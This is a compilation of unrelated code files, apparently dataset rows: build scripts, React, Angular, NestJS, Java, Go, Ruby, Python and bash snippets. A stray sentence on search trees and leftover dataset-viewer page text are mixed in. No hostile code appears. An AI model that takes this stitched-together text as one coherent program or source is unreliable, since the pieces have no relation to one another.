java -jar ../../closure/compiler.jar \
    --create_source_map WMJSExt.min.js.map \
    --js ../apps/appframework.js \
    --js ../webmapjsext/WMJSExt/LayerPropertiesPanel.js \
    --js ../webmapjsext/WMJSExt/StylePanel.js \
    --js ../webmapjsext/WMJSExt/DimensionPanel.js \
    --js ../webmapjsext/WMJSExt/MapPanel.js \
    --js ../webmapjsext/WMJSExt/ServicePanel.js \
    --js ../webmapjsext/WMJSExt/ServicePanelManager.js \
    --js ../webmapjsext/WMJSExt/LayerPanel.js \
    --js ../webmapjsext/WMJSExt/DataPanel.js \
    --js ../webmapjsext/WMJSExt/BaseMapSelector.js \
    --js ../webmapjsext/WMJSExt/MapTypeSelector.js \
    --js ../webmapjsext/WMJSExt/AnimationPanel.js \
    --js ../webmapjsext/WMJSExt/PermaLinkPanel.js \
    --js ../webmapjsext/WMJSExt/UxDateTimeForm.js \
    --js ../webmapjsext/WMJSExt/CheckColumn.js \
    --js ../webmapjsext/WMJSExt/IFramePanel.js \
    --js ../webmapjsext/WMJSExt/WCSPanel.js \
    --js ../webmapjsext/WMJSExt/WindowFader.js \
    --js ../webmapjsext/WMJSExtMain.js \
    --js ../apps/gfiapp_d3c3.js \
    --js ../apps/gfiapp_point_interest.js \
    --js ../apps/gfiapp_eprofile.js \
    --js ../apps/autowms_app.js \
    --js ../apps/tddjs.js \
    --js_output_file WMJSExt.min.js
echo "//# sourceMappingURL=WMJSExt.min.js.map" >> WMJSExt.min.js
# echo "" > adagucviewer.min.js
# cat ../jquery/hammer.min.js >> adagucviewer.min.js
# cat ../jquery/jquery-1.12.4.min.js >> adagucviewer.min.js
# cat ../jquery/jquery-ui.min.js >> adagucviewer.min.js
# cat jquery-addons.min.js >> adagucviewer.min.js
# cat ../d3/d3.v3.min.js >> adagucviewer.min.js
# cat ../d3/c3.min.js >> adagucviewer.min.js
# cat ../extjs-4.2.1/ext-all.js >> adagucviewer.min.js
# rm WMJS.min.js
# rm WMJSExt.min.js
# rm jquery-addons.min.js
|
import Typography from "@mui/material/Typography";
import Link from "@mui/material/Link";
import * as React from "react";
export default function Copyright(props) {
return (
<Typography variant="body2" color="text.secondary" align="center" {...props}>
{'Copyright © '}
<Link color="inherit" href="https://github.com/pajelonek/">
Clip Watcher
</Link>{' '}
{new Date().getFullYear()}
{'.'}
</Typography>
);
}
|
/*
* %CopyrightBegin%
*
* Copyright Ericsson AB 1999-2009. All Rights Reserved.
*
* The contents of this file are subject to the Erlang Public License,
* Version 1.1, (the "License"); you may not use this file except in
* compliance with the License. You should have received a copy of the
* Erlang Public License along with this software. If not, it can be
* retrieved online at http://www.erlang.org/.
*
* Software distributed under the License is distributed on an "AS IS"
* basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See
* the License for the specific language governing rights and limitations
* under the License.
*
* %CopyrightEnd%
*
*/
// Demo client for the rmod_random Erlang server (erl_interface/IC example).
// NOTE(review): the lowercase class name "client" violates Java naming
// conventions, but renaming would break the example's build/run scripts.
public class client {
    // Identity of this node, the peer Erlang node, and the shared cookie.
    private static java.lang.String SNode = "client";
    private static java.lang.String PNode = "babbis";
    private static java.lang.String Cookie = "flash";
    // Registered name of the server process on the peer node.
    private static java.lang.String Server = "rmod_random_impl";
    // IDL-generated stub that forwards calls to the Erlang server.
    private static rmod._randomStub stub;

    // Connects, seeds the remote RNG, prints ten random numbers, disconnects.
    public static void main(String[] args) {
        try {
            stub = new rmod._randomStub(SNode,PNode,Cookie,Server);

            int seed1 = 1;
            int seed2 = 2;
            int seed3 = 3;
            double random = 0;

            System.out.print("\nClient initialization....");
            stub.init(seed1,seed2,seed3);
            System.out.println("ok\n");

            for (int i = 0; i < 10; i++) {
                random = stub.produce();
                System.out.println("Random" + i + " = " + random);
            }

            System.out.println("\nClient terminated.\n");
            // Release the connection to the Erlang node.
            stub.__disconnect();
        } catch( Exception e) {
            System.out.println("Exception :");
            e.printStackTrace();
        }
    }
}
|
# Inject the analytics fragment into the built page: for each line matching
# ^</body> in build/index.html, GNU sed's `e` command runs `cat` and emits the
# fragment's contents before that line, editing the file in place (-i).
# NOTE(review): the `e` command is a GNU sed extension — not portable to
# BSD/macOS sed; verify the build environment.
sed -i '/^<\/body>/e cat ./analytics/analytics-fragment.txt' ./build/index.html
An array can provide fast search operations, but not fast add/delete operations. A binary search tree provides fast search, and its add/delete operations are also quite fast.
// Repository: thushanperera95/Find-My-Phone
package com.thunderboltsoft.findmyphone.receivers;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.widget.Toast;
import com.thunderboltsoft.findmyphone.activites.FindMyPhoneDialogActivity;
/**
 * Receives the app's test broadcast and pops up the Find My Phone dialog.
 */
public class PopupBroadcastReceiver extends BroadcastReceiver {

    /** Broadcast action this receiver reacts to. */
    private static final String ACTION_FIND_MY_PHONE = "testingkaozgamer";

    /**
     * Shows a confirmation toast and launches {@link FindMyPhoneDialogActivity}
     * when the expected action is received.
     *
     * Bug fix: the original called {@code intent.getAction().equals(...)},
     * which throws a NullPointerException for intents delivered without an
     * action; comparing constant-first is null-safe.
     */
    @Override
    public void onReceive(Context context, Intent intent) {
        if (ACTION_FIND_MY_PHONE.equals(intent.getAction())) {
            Toast.makeText(context, "Testing Broadcast", Toast.LENGTH_LONG).show();
            Intent i = new Intent(context, FindMyPhoneDialogActivity.class);
            // Required when starting an activity from a non-activity context.
            i.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
            context.startActivity(i);
        }
    }
}
|
package me.mrdaniel.adventuremmo.utils;
import org.spongepowered.api.Server;
import org.spongepowered.api.block.BlockTypes;
import org.spongepowered.api.entity.living.player.Player;
import org.spongepowered.api.text.Text;
import org.spongepowered.api.util.blockray.BlockRay;
import org.spongepowered.api.util.blockray.BlockRayHit;
import org.spongepowered.api.world.Location;
import org.spongepowered.api.world.World;
import javax.annotation.Nonnull;
import java.util.Optional;
public class ServerUtils {
public static void broadcast(@Nonnull final Server server, @Nonnull final Text message) {
server.getOnlinePlayers().forEach(p -> p.sendMessage(message));
}
@Nonnull
public static Optional<Location<World>> getFirstBlock(@Nonnull final Player p) {
for (BlockRayHit<World> worldBlockRayHit : BlockRay.from(p).distanceLimit(50)) {
Location<World> loc = worldBlockRayHit.getLocation();
if (loc.getBlockType() != BlockTypes.AIR) {
return Optional.of(loc);
}
}
return Optional.empty();
}
} |
=begin
#RadioManager
#RadioManager
OpenAPI spec version: 2.0
Contact: <EMAIL>
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.3.0
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for RadioManagerClient::UserResultSettings
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
# Auto-generated placeholder spec for RadioManagerClient::UserResultSettings.
# Each attribute block is a stub: add real expectations as behaviour solidifies.
describe 'UserResultSettings' do
  before do
    # run before each test — a fresh model instance per example
    @instance = RadioManagerClient::UserResultSettings.new
  end

  after do
    # run after each test
  end

  describe 'test an instance of UserResultSettings' do
    it 'should create an instance of UserResultSettings' do
      expect(@instance).to be_instance_of(RadioManagerClient::UserResultSettings)
    end
  end

  describe 'test attribute "show_side_bar"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end

  describe 'test attribute "show_social_bar"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end

  describe 'test attribute "show_checkbox_column"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end

  describe 'test attribute "show_time_column"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end

  describe 'test attribute "show_speech_time"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end

  describe 'test attribute "zoom_factor"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end
end
|
#!/usr/bin/env bash
# Block until a TCP port on localhost accepts connections.
# Usage: wait-for-port.sh <port>

port="$1"

# Robustness fix: fail fast with a usage message instead of looping forever
# when no port argument was supplied.
if [ -z "$port" ]; then
    echo "Usage: $0 <port>" >&2
    exit 1
fi

echo -n "Waiting for Port: $port "
# Poll every 100 ms until nc can open a connection.
while ! nc -vz localhost "$port" ; do
    echo -n "."
    sleep 0.1
done
echo ""
echo "Done!"
|
import { BadRequestException, Injectable } from '@nestjs/common';
import { InjectRepository } from '@nestjs/typeorm';
import { Repository } from 'typeorm';
import { AddressDto } from './address.dto';
import { Address } from './address.entity';
import * as CeepCoords from 'coordenadas-do-cep';
@Injectable()
export class AddressService {
  constructor(@InjectRepository(Address) private repo: Repository<Address>) {}

  /**
   * Persists a new address. An address must belong to either an
   * establishment or a user; otherwise a 400 is thrown.
   * Returns the saved entity re-fetched with its relations loaded.
   */
  public async createOne(dto: AddressDto): Promise<Address> {
    if (!dto.establishment && !dto.user) {
      throw new BadRequestException(
        'É obrigatório que o endereço tenha ou um estabelecimento ou um usuário',
      );
    }
    const address: Address = await this.repo.save((dto as unknown) as Address);
    return this.repo.findOne(address.id, {
      relations: ['user', 'establishment'],
    });
  }

  /**
   * Applies a partial update to the address identified by `id` and returns
   * the updated row with relations loaded.
   *
   * Bug fix: the re-fetch now uses the `id` parameter instead of
   * `address.id` — the update payload may be partial and carry no id, which
   * previously made this a findOne(undefined) lookup.
   */
  public async updateAddress(id: string, address: Address): Promise<Address> {
    await this.repo.update(id, address);
    return this.repo.findOne(id, {
      relations: ['user', 'establishment'],
    });
  }

  /** Resolves coordinates for a Brazilian postal code (CEP). */
  public async getCep(cep: string) {
    return CeepCoords.getByCep(cep);
  }
}
|
import { Component, Input } from '@angular/core';
import { InheritedEnvVarFormElement } from './inherited-env-var-form-element';
@Component({
  selector: 'app-inherited-env-vars-form-element',
  templateUrl: './inherited-env-vars-form-element.component.html',
  styles: [],
})
export class InheritedEnvVarsFormElementComponent {
  /** Rows currently shown in the form. */
  @Input() inheritedEnvVars: InheritedEnvVarFormElement[];
  /** Variable names offered for selection in the template. */
  @Input() availableEnvVarNames: string[];

  /** Appends an empty row to the end of the list. */
  addInheritedEnvVar(): void {
    const emptyRow: InheritedEnvVarFormElement = { name: '', alias: '' };
    this.inheritedEnvVars.push(emptyRow);
  }

  /** Removes the row at position i. */
  deleteInheritedEnvVar(i: number): void {
    this.inheritedEnvVars.splice(i, 1);
  }

  /** ngFor trackBy: track rows by index so inputs keep focus while editing. */
  trackByIndex(index: number, obj: any): any {
    return index;
  }
}
|
import logging
class TextSearchApp:
    """Small demo app that logs one message per text searched in a corpus.

    Bug fixes vs. the original:

    * ``setup_logger`` passed a brace-style format string to
      ``logging.basicConfig`` without ``style='{'`` — on Python 3.8+ the
      format is validated against the default '%' style and raises
      ``ValueError``.
    * ``{warningname}`` is not a ``LogRecord`` attribute; the intended
      attribute is ``{levelname}``.
    """

    def __init__(self, timedivider=1000, loglevel='INFO'):
        # timedivider: NOTE(review) currently unused — presumably meant to
        # scale relativeCreated (milliseconds); confirm intent before use.
        self.timedivider = timedivider
        self.loglevel = loglevel
        self.logger = None  # created lazily by setup_logger()

    def setup_logger(self):
        """Configure root logging (brace style) and create this app's logger."""
        # relativeCreated is in milliseconds, hence the "ms" label.
        log_format = '{relativeCreated:8.2f} ms {levelname}| {message}'
        logging.basicConfig(format=log_format, style='{', level=self.loglevel)
        self.logger = logging.getLogger(__name__)

    def search_corpus(self, corpus):
        """Log one INFO line per text in ``corpus`` (any iterable of strings)."""
        if self.logger is None:
            self.setup_logger()
        for text in corpus:
            self.logger.info('Searching for: %s', text)
# Demonstration of usage
if __name__ == "__main__":
    demo_app = TextSearchApp()
    demo_terms = ['keyword1', 'keyword2', 'keyword3']
    demo_app.search_corpus(demo_terms)
package main
import (
"fmt"
"log"
"os"
"os/signal"
"runtime/debug"
"syscall"
srv "github.com/moooofly/dms-detector/pkg/servitization"
"github.com/moooofly/dms-detector/probe"
"github.com/moooofly/dms-detector/router"
)
// main wires up servitization, launches the HTTP router in the
// background, and then blocks in Clean awaiting a shutdown signal.
func main() {
	if err := srv.Init(); err != nil {
		log.Fatalf("err : %s", err)
	}

	// Serve the router concurrently; a launch failure is fatal.
	go func() {
		if err := router.Launch(); err != nil {
			log.Fatalf("err : %s", err)
		}
	}()

	// Hand the active probe (if any) to the signal handler; nil is fine.
	var active *probe.Probe
	if srv.Pbi != nil && srv.Pbi.S != nil {
		active = &srv.Pbi.S
	}
	Clean(active)
}
// Clean blocks until a termination signal arrives, then stops the given
// probe (if any), tears down servitization, and exits the process.
//
// s may be nil, and *s may also be nil; both cases skip probe cleanup
// but still run srv.Teardown().
func Clean(s *probe.Probe) {
	signalChan := make(chan os.Signal, 1)
	cleanupDone := make(chan bool)
	// NOTE(review): os.Interrupt and syscall.SIGINT are the same signal on
	// POSIX systems, so the list is slightly redundant but harmless.
	signal.Notify(signalChan,
		os.Interrupt,
		syscall.SIGHUP,
		syscall.SIGINT,
		syscall.SIGTERM,
		syscall.SIGQUIT)
	go func() {
		// Recover so a panic during cleanup still prints a stack trace
		// instead of killing the process silently.
		defer func() {
			if e := recover(); e != nil {
				fmt.Printf("crashed, err: %s\nstack:\n%s", e, string(debug.Stack()))
			}
		}()
		for range signalChan {
			log.Println("Received an interrupt, stopping probes...")
			if s != nil && *s != nil {
				(*s).Clean()
			}
			srv.Teardown()
			// Unblock the caller; os.Exit below then terminates the loop.
			cleanupDone <- true
		}
	}()
	// Park the caller until the first signal has been fully handled.
	<-cleanupDone
	os.Exit(0)
}
|
# Presents timestamps converted to US Eastern ("DC") time, with helpers
# for formatting and human-friendly relative descriptions.
class DcTimePresenter
  include ActionView::Helpers::TextHelper

  # Placeholder rendered when there is no time to show.
  # NOTE(review): looks like this was once "&nbsp;" — confirm the literal
  # survived encoding.
  NULL = " ".html_safe.freeze
  # e.g. "January 02, 2021 03:04:05 PM"
  FORMAT = "%B %d, %Y %r".freeze
  TIME_ZONE_NAME = 'Eastern Time (US & Canada)'.freeze

  attr_reader :time

  def initialize(time)
    @time = time
  end

  # Class-level convenience: convert +time+ to the DC zone.
  def self.convert(time)
    new(time).convert
  end

  # Parses a time string, interpreting it in the DC time zone.
  def self.parse(time)
    time_zone.parse(time)
  end

  def self.convert_and_format(time, format = FORMAT, timezone_label: true)
    new(time).convert_and_format(format, timezone_label: timezone_label)
  end

  def self.format(time, format = FORMAT)
    new(time).format(format)
  end

  def self.time_zone
    ActiveSupport::TimeZone[TIME_ZONE_NAME]
  end

  # Returns the time in the DC zone, or nil when no time was given.
  def convert
    return unless time
    time.in_time_zone(time_zone)
  end

  # Formats the raw time and appends the zone abbreviation.
  # NOTE(review): unlike convert_and_format, this does NOT convert to the
  # DC zone first — confirm callers expect the time's own zone here.
  def format(format)
    "#{time.strftime(format)} #{timezone_string}"
  end

  # Converts then formats; appends the zone label unless disabled.
  # Falls back to NULL when time is absent.
  def convert_and_format(format = FORMAT, timezone_label: true)
    if time
      str = convert.strftime(format)
      str += " #{timezone_string}" if timezone_label
      str
    else
      NULL
    end
  end

  # Human-friendly distance: "in 2 hours" / "35 minutes ago" when within
  # a day, otherwise "on <date> at <time>".
  def relative_time
    time_diff = (time - Time.now).to_i
    abs_time_diff = time_diff.abs
    if abs_time_diff < 24.hours
      # Hours when over an hour away, minutes otherwise (integer division).
      relative_time = if abs_time_diff > 3600
        pluralize(abs_time_diff / 3600, "hour")
      else
        pluralize(abs_time_diff / 60, "minute")
      end
      if time_diff.positive?
        "in #{relative_time}"
      else
        "#{relative_time} ago"
      end
    else
      # NOTE(review): the local `time` below shadows the attr_reader for the
      # rest of this branch; `date` is computed first, so behavior is intact.
      date = convert_and_format('%b %-d, %Y', timezone_label: false)
      time = convert_and_format('%-l:%M %p')
      "on #{date} at #{time}"
    end
  end

  def time_zone
    self.class.time_zone
  end

  # Zone abbreviation (e.g. "EST"/"EDT") of the converted time.
  def timezone_string
    convert.zone
  end
end
|
import React from 'react'
import styled from "styled-components"
import Section from './Section'
function Home() {
return (
<Container>
<Section
title="Model S"
description="Order Online for Touchless Delivery"
backgroundImg="model-s.jpg"
leftBtnText="Exixting inventory"
/>
{/* <Section/>
<Section/> */}
</Container>
)
}
export default Home

// Full-viewport wrapper so each section fills the screen.
const Container = styled.div`
height: 100vh;
`
|
package engine.visualization;
import engine.entities.Entity;
import javafx.scene.Group;
import javafx.scene.control.ChoiceBox;
import javafx.scene.paint.Color;
import javafx.scene.shape.Circle;
import javafx.scene.shape.Line;
import javafx.scene.text.Text;
import javafx.scene.text.TextBoundsType;
import java.util.ArrayList;
import java.util.List;
public class Visualizer {
private static final double RADIUS = 75;
private static final String FONT = "-fx-font-family: \"Georgia\";" + "-fx-font-size: 18px;";
private Entity entity;
private Visualizer parentVisualizer;
private String UID;
private Group group;
private List<Visualizer> childrenList;
private List<Line> lines;
private int numChildren;
public Visualizer(Entity entity, Visualizer parentVisualizer){
this.entity = entity;
this.parentVisualizer = parentVisualizer;
this.UID = entity.UIDforObject();
this.group = new Group();
group.relocate(0, 0);
childrenList = new ArrayList<>();
lines = new ArrayList<>();
numChildren = entity.getChildren().size();
initialize();
}
private void initialize(){
Circle root = addCircle(0, 0, RADIUS);
styleRoot(root);
addText(UID, root);
addChildren();
}
protected Circle addCircle(double centerX, double centerY, double radius){
Circle circle = new Circle(centerX, centerY, radius);
group.getChildren().add(circle);
return circle;
}
protected void addText(String string, Circle circle) {
Text text = new Text(circle.getCenterX() - 18.0, circle.getCenterY(), string.substring(0, 5));
text.setBoundsType(TextBoundsType.VISUAL);
text.setStyle(FONT);
group.getChildren().add(text);
}
private void addChildren(){
entity.getChildren().forEach(e -> {childrenList.add(new Visualizer(e, this));});
}
private void styleRoot(Circle circle){
circle.setStroke(Color.BLACK);
circle.setFill(Color.WHITE);
}
private void styleParent(Circle circle) {
circle.setFill(Color.CORNFLOWERBLUE);
}
protected void styleChild(Circle circle) {
circle.setFill(Color.ORCHID);
}
protected ChoiceBox<String> addChoiceBox(Circle circle){
ChoiceBox<String> choiceBox = new ChoiceBox<>();
circle.setFill(Color.BISQUE);
choiceBox.setVisible(false);
choiceBox.setLayoutX(circle.getCenterX());
choiceBox.setLayoutY(circle.getCenterY());
group.getChildren().add(choiceBox);
choiceBox.toFront();
return choiceBox;
}
public Visualizer getParentVisualizer(){return parentVisualizer;}
public List<Visualizer> getChildrenList(){return childrenList;}
public Group getGroup(){return group;}
public List<Line> getLines(){return lines;}
public int getNumChildren(){return numChildren;}
public String getUID(){return UID;}
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.